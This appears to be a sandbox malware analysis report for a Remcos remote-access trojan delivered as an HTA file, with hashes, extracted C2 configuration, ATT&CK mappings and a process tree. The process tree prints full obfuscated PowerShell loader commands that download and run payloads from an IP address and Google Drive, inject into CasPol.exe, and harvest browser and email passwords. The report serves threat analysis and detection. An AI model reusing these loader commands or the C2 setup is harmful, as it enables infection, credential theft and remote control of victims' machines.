remcos | dd91f1901fdf77dd38dc7b80a594e71b3738ada75efa3dffc7427d3e9a5d2e10

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-10-2024 12:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seemybestthingwhichigiventouformakebestappinesswogiven.hta
Size

131KB
MD5

ae04ff9a416a5781935e9a6dfe46c66f
SHA1

e8c5538ae08082cf47cc08cdf36f7f4a9a20a101
SHA256

dd91f1901fdf77dd38dc7b80a594e71b3738ada75efa3dffc7427d3e9a5d2e10
SHA512

b4a66b29deecba3c1c7b2ad0d0912c2e9ccfae12b6a5bda0d2b3d6cfa93de2fe908ea55202146ce0fb87f8955348b1ea16f1fd31e18948782d097d3c531edc37
SSDEEP

96:Eagt7RWVgFVVLH7C4b5nLbfbqI05kyGvqyGQtNVpVfGV7ZT:EagFRM4hbSkyzytqT

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

remcos

Botnet

RemoteHost

cokka.duckdns.org:9764

cokka.duckdns.org:9674

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-TTZ00A
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1396-128-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/692-127-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1668-125-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/692-127-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/1396-128-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 4 IoCs

flow	pid	Process
21	2252	POWeRSheLL.eXE
25	2592	powershell.exe
28	2592	powershell.exe
34	2592	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1924	powershell.exe
2592	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2252	POWeRSheLL.eXE
324	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	drive.google.com
25	drive.google.com

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2592 set thread context of 1408	2592	powershell.exe	103
PID 1408 set thread context of 1396	1408	CasPol.exe	104
PID 1408 set thread context of 692	1408	CasPol.exe	105
PID 1408 set thread context of 1668	1408	CasPol.exe	108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRSheLL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	POWeRSheLL.eXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2252	POWeRSheLL.eXE
2252	POWeRSheLL.eXE
324	powershell.exe
324	powershell.exe
1924	powershell.exe
1924	powershell.exe
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe
1396	CasPol.exe
1396	CasPol.exe
1668	CasPol.exe
1668	CasPol.exe
1396	CasPol.exe
1396	CasPol.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
1408	CasPol.exe
1408	CasPol.exe
1408	CasPol.exe
1408	CasPol.exe
1408	CasPol.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2252	POWeRSheLL.eXE
Token: SeDebugPrivilege	324	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	1668	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1408	CasPol.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 3928 wrote to memory of 2252	3928	mshta.exe	84
PID 3928 wrote to memory of 2252	3928	mshta.exe	84
PID 3928 wrote to memory of 2252	3928	mshta.exe	84
PID 2252 wrote to memory of 324	2252	POWeRSheLL.eXE	89
PID 2252 wrote to memory of 324	2252	POWeRSheLL.eXE	89
PID 2252 wrote to memory of 324	2252	POWeRSheLL.eXE	89
PID 2252 wrote to memory of 836	2252	POWeRSheLL.eXE	94
PID 2252 wrote to memory of 836	2252	POWeRSheLL.eXE	94
PID 2252 wrote to memory of 836	2252	POWeRSheLL.eXE	94
PID 836 wrote to memory of 2920	836	csc.exe	95
PID 836 wrote to memory of 2920	836	csc.exe	95
PID 836 wrote to memory of 2920	836	csc.exe	95
PID 2252 wrote to memory of 4200	2252	POWeRSheLL.eXE	97
PID 2252 wrote to memory of 4200	2252	POWeRSheLL.eXE	97
PID 2252 wrote to memory of 4200	2252	POWeRSheLL.eXE	97
PID 4200 wrote to memory of 1924	4200	WScript.exe	98
PID 4200 wrote to memory of 1924	4200	WScript.exe	98
PID 4200 wrote to memory of 1924	4200	WScript.exe	98
PID 1924 wrote to memory of 2592	1924	powershell.exe	102
PID 1924 wrote to memory of 2592	1924	powershell.exe	102
PID 1924 wrote to memory of 2592	1924	powershell.exe	102
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 2592 wrote to memory of 1408	2592	powershell.exe	103
PID 1408 wrote to memory of 1396	1408	CasPol.exe	104
PID 1408 wrote to memory of 1396	1408	CasPol.exe	104
PID 1408 wrote to memory of 1396	1408	CasPol.exe	104
PID 1408 wrote to memory of 1396	1408	CasPol.exe	104
PID 1408 wrote to memory of 692	1408	CasPol.exe	105
PID 1408 wrote to memory of 692	1408	CasPol.exe	105
PID 1408 wrote to memory of 692	1408	CasPol.exe	105
PID 1408 wrote to memory of 692	1408	CasPol.exe	105
PID 1408 wrote to memory of 1468	1408	CasPol.exe	106
PID 1408 wrote to memory of 1468	1408	CasPol.exe	106
PID 1408 wrote to memory of 1468	1408	CasPol.exe	106
PID 1408 wrote to memory of 3456	1408	CasPol.exe	107
PID 1408 wrote to memory of 3456	1408	CasPol.exe	107
PID 1408 wrote to memory of 3456	1408	CasPol.exe	107
PID 1408 wrote to memory of 1668	1408	CasPol.exe	108
PID 1408 wrote to memory of 1668	1408	CasPol.exe	108
PID 1408 wrote to memory of 1668	1408	CasPol.exe	108
PID 1408 wrote to memory of 1668	1408	CasPol.exe	108

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybestthingwhichigiventouformakebestappinesswogiven.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3928
- C:\Windows\SysWOW64\wInDoWspoWERShell\V1.0\POWeRSheLL.eXE
  "C:\Windows\SYsTEm32\wInDoWspoWERShell\V1.0\POWeRSheLL.eXE" "poWERSHelL.exe -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe ; iex($(IEx('[syStem.TeXT.eNcOdInG]'+[chAR]58+[chAr]58+'UtF8.GetstRiNg([sYstEm.conVErt]'+[cHAR]58+[ChAr]58+'FrOMbASE64stRInG('+[CHAR]34+'JFRYOHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSRGVGSU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoTXR3U0FMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlXRlFYWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsV05uV1BtU3Vacyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSURNekQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR0NERFpyTkJNeXUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhdUdtbnpkWiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3NJQ3lpZlhzeEkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFRYOHM6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xMDEuMjEvNDEyL3NlZXRoZWJlc3R0aGluZ3NnaXZpbmdyZW5lcmd5dG9teWVudGlyZWxpZmVmb3JnZXRoZXJiYWNrLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZ2l2aW5ncmVuZXJneXRvbXllbnRpcmVsaWZlZm9yZ2V0aC5WQnMiLDAsMCk7U3RBUnQtc2xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NnaXZpbmdyZW5lcmd5dG9teWVudGlyZWxpZmVmb3JnZXRoLlZCcyI='+[cHAr]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2252
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\le2zfvcb\le2zfvcb.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA690.tmp" "c:\Users\Admin\AppData\Local\Temp\le2zfvcb\CSC8AD06143CE84E2683DAC3A0BFEB9AC4.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2920
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsgivingrenergytomyentirelifeforgeth.VBs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4200
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigoR2VULVZBUmlhQmxFICcqbURSKicpLk5BTUVbMywxMSwyXS1KT0luJycpKCAoKCc3JysnVk1pbWFnZVVybCA9IHptd2h0dHBzOi8vZHJpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHptdzs3Vk13ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0JysnIFN5c3RlbS5OZXQuV2ViQ2xpZW50OzdWTWknKydtYWdlQnl0ZXMgPSA3Vk13ZWJDbGllbnQuRG93bmxvYWREYXRhKDdWTWltYWdlVXJsKTs3Vk1pbWFnZVRleHQgPSAnKydbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVCcrJ0YnKyc4LkdldFN0cmluZyg3Vk1pbWFnZUJ5dGVzKTs3Vk1zdGFydEZsYWcgPSB6bXc8PEJBUycrJ0U2NF9TVEFSVD4+em13OzdWTWVuZEZsYWcgPSB6bXc8PEJBU0U2JysnNF9FTkQ+Pnptdzs3Vk1zdGFydEluJysnZGV4ID0gNycrJ1ZNaW1hZ2VUZXh0LkluZGV4T2YoN1ZNc3RhcnRGbGFnKTs3Vk1lbmRJbmRleCA9IDdWTWltYWcnKydlVGV4dC5JbmRleE9mKDdWTWVuZEZsYWcpOzdWTXN0JysnYXJ0SW5kZXggLScrJ2dlIDAgLWFuZCA3Vk1lbmRJbmQnKydleCAtZ3QgN1ZNc3RhcnRJbmRleCcrJzs3Vk1zdGFydEluZGV4ICs9IDdWTXN0YXJ0RmxhZy5MZW5ndGg7N1ZNJysnYmFzZTY0TGVuZ3RoID0gJysnNycrJ1ZNZW5kSW5kZXggLSA3VicrJ01zdGEnKydydEluZGV4OzdWTWJhc2U2NENvbW1hbmQgPSA3Vk1pbWFnZVRleHQuU3ViJysnc3RyaW5nKDdWTXN0YXJ0SW5kZXgsIDdWTWJhc2U2NExlbmd0aCk7N1ZNJysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN1YnKydNYicrJ2FzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHJwOCBGb3JFYWNoLU9iamVjdCB7IDdWTV8gfSlbLTEuLi0oN1ZNYmEnKydzZTY0Q29tbWFuZC5MZW5ndGgpXTs3Vk1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm8nKydtQmFzZTY0U3RyaW5nKDdWTWJhc2U2NFJldmVycycrJ2VkKTs3Vk0nKydsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoN1ZNY29tbWFuZEJ5dGVzKTs3Vk12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHptd1ZBSXptdyk7N1ZNdmFpTWV0aG9kLkludm9rZSg3Vk1udWxsLCAnKydAKHptd3R4dC5UVFInKydDTUxMLzIxNC8xMi4xJysnMDEuMy4yOTEvLzpwdHRoem13LCB6bXdkZXNhdGl2YWRvem13LCB6bXdkZXNhdGl2YScrJ2Rvem13LCB6bXdkZXNhdGl2YWRvem13LCB6bXdDYXNQb2x6bXcsIHptd2Rlc2F0aXZhZCcrJ296bXcsIHptd2Rlc2F0aXZhZG96bXcsem13ZGVzYXRpdmFkb3ptdyx6bXdkZXNhdGl2YWRvem13LHptd2Rlc2F0aXYnKydhZG96bXcsem13ZGVzYXRpdmFkb3ptdyx6bXdkZXNhdGl2JysnYWRveicrJ213LHptdzF6bXcsem13ZGVzYXRpdmFkb3ptdykpOycpICAtckVQbEFDZSAncnA4JyxbQ0hhcl0xMjQgIC1jcmVQbGFDRSAgKFtDSGFyXTEyMitbQ0hhcl0xMDkrW0NIYXJdMTE5KSxbQ0hhcl0zOS1jcmVQbGFDRShbQ0hhcl01NStbQ0hhcl04NitbQ0hhcl03NyksW0NIYXJdMzYpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1924
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((GeT-VARiaBlE '*mDR*').NAME[3,11,2]-JOIn'')( (('7'+'VMimageUrl = zmwhttps://drive.'+'google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zmw;7VMwebCli'+'ent = New-Object'+' System.Net.WebClient;7VMi'+'mageBytes = 7VMwebClient.DownloadData(7VMimageUrl);7VMimageText = '+'[System.Text.Encoding]::UT'+'F'+'8.GetString(7VMimageBytes);7VMstartFlag = zmw<<BAS'+'E64_START>>zmw;7VMendFlag = zmw<<BASE6'+'4_END>>zmw;7VMstartIn'+'dex = 7'+'VMimageText.IndexOf(7VMstartFlag);7VMendIndex = 7VMimag'+'eText.IndexOf(7VMendFlag);7VMst'+'artIndex -'+'ge 0 -and 7VMendInd'+'ex -gt 7VMstartIndex'+';7VMstartIndex += 7VMstartFlag.Length;7VM'+'base64Length = '+'7'+'VMendIndex - 7V'+'Msta'+'rtIndex;7VMbase64Command = 7VMimageText.Sub'+'string(7VMstartIndex, 7VMbase64Length);7VM'+'base64Reversed = -join (7V'+'Mb'+'ase64Command.ToCharArray() rp8 ForEach-Object { 7VM_ })[-1..-(7VMba'+'se64Command.Length)];7VMcommandBytes = [System.Convert]::Fro'+'mBase64String(7VMbase64Revers'+'ed);7VM'+'loadedAssembly = [System.Reflection.Assembly]::Load(7VMcommandBytes);7VMvaiMethod = [dnlib.IO.Home].GetMethod(zmwVAIzmw);7VMvaiMethod.Invoke(7VMnull, '+'@(zmwtxt.TTR'+'CMLL/214/12.1'+'01.3.291//:ptthzmw, zmwdesativadozmw, zmwdesativa'+'dozmw, zmwdesativadozmw, zmwCasPolzmw, zmwdesativad'+'ozmw, zmwdesativadozmw,zmwdesativadozmw,zmwdesativadozmw,zmwdesativ'+'adozmw,zmwdesativadozmw,zmwdesativ'+'adoz'+'mw,zmw1zmw,zmwdesativadozmw));') -rEPlACe 'rp8',[CHar]124 -crePlaCE ([CHar]122+[CHar]109+[CHar]119),[CHar]39-crePlaCE([CHar]55+[CHar]86+[CHar]77),[CHar]36))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2592
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1408
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xhbtknkcrpcjw"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1396
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ikhdlfvefxuoyxsa"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:692
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kemwmxfxtfmtidommrg"
        7⤵
        
        PID:1468
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kemwmxfxtfmtidommrg"
        7⤵
        
        PID:3456
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kemwmxfxtfmtidommrg"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
3f1149204ab2887960a37373161d1124

SHA1
3026ff2476741057e93429985fd7586073e0c906

SHA256
cfc95831f548584337d6492cedea8afab8b40216d717c3f9587f19e959b7feff

SHA512
830068066ed5fb9031d6854ed75551ff366defd28d861f408aeca7675ed91a25550538dda6f45088d5aafea7043d6e2801a55f22760d421a753e83e972a32132

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWeRSheLL.eXE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
51bb00897cef3ce526db6711c37fc8aa

SHA1
e93331635aee7c2af16c1eadbcb7d4c136f2492f

SHA256
dcf5b19b51080d4f22551b2961bef374abc30b71eaaa74db4cac1687efbddd89

SHA512
76c7a9f16d85e7fdca8ec1738749323d735c2c501c0621030507abc3b28f35dc9f93d1c575c97c6db9f1c9e8c92c8887f48ae8351af1b1dc68242a908739bd39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
59661e05625ccd54337fe1b6d5539689

SHA1
8faa62165fffff16bb517a4f61d1047a01dfbb55

SHA256
b7abf8f78827b9c1f01f7082805623ccd09e802f81c25036abf095745985f6c5

SHA512
206b2b744dcd14a49c4991cb2684e550d5b80fbcf3ef037af8eb020a9b719cd3ea4adfd3f279731c7fe1dfc59374d2e062650abbb111a252113f2fd348b0ac25

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA690.tmp

Filesize
1KB

MD5
d89f467b200dfebcf8dcd1133b769506

SHA1
ac3d22845cfe73131f1f2ea8b66e67529b6649f7

SHA256
a543472124b46634e34edded4593cfc5eb7a967542d2189fbc6aa8bdef1e007e

SHA512
4dd5595011e59fbc5f2df071d0d68fc667e252772caa7f58fb626b890526503604e493c866fee0203e88cebd7b197dba70c9364e8f05c89575a745d7cad38bc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2vp0uyeg.csv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\le2zfvcb\le2zfvcb.dll

Filesize
3KB

MD5
81cf5bb810ee7f0376f2a64b359900d9

SHA1
2f0a99d03415b9a8446e5c87d8b11058b37718d8

SHA256
8f3c89f7a5e1aeeb4701e160cfb50508549bc57ffa88cdae97cf94abdd1f6bd8

SHA512
4bc33549e9b58a24f146069220eb4b5cc2e73d4827c9b13ab734b2e9f7afd25bdfa36982b904d408ec65438d24c776a6f4bf010cb5a808ee8ebd5cbacd1d8d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\xhbtknkcrpcjw

Filesize
4KB

MD5
f1d2c01ce674ad7d5bad04197c371fbc

SHA1
4bf0ed04d156a3dc6c8d27e134ecbda76d3585aa

SHA256
25b006032deccd628940ef728fffe83b325a85de453a34691f55f570e4460094

SHA512
81cb982cc33dcc27600a8a681c3ec3cc5b9221b95baa45e1ab24479745a9638b9f31d7beeeb1128b3294ff69b44e958c75e25d565f66790c364665caff96ee77

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsgivingrenergytomyentirelifeforgeth.VBs

Filesize
138KB

MD5
87f50d339477dd3708f80a5e286fea7e

SHA1
f35d36f7b3b9ed4552509f7ef915bc22bb43c310

SHA256
dd648d14e67dbf28a2bdd7ed56288147b7a2f5b5d1dfba56ecb9975fc745c527

SHA512
4c9b7579da6c594d8511e8a75a5b7b812d938c2f37a9c5cf0943203950f112e93ace9a3d210cc2b0b0c8cdfd4781a84e545295b766ccaa60a18509f78620d2a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\le2zfvcb\CSC8AD06143CE84E2683DAC3A0BFEB9AC4.TMP

Filesize
652B

MD5
0a85b1dc2895035ae2da4b6fe6a1654c

SHA1
7da640aa61f0b48fe8dd493bd9d42749ec57ac48

SHA256
f522b0c4d43e84c6251abe2dc1157bc2fa658265dc6e0d49a6fc827dd2f62843

SHA512
53b7d5cf462ec0728e4d6bcc0a8e9a6e88b1042a45a00645ef0f20e9a88008af10fdbe5df4219a349ceb2c60ee70fc0e2b4de051c1d0762407e0ebb47909cd25

Download Submit
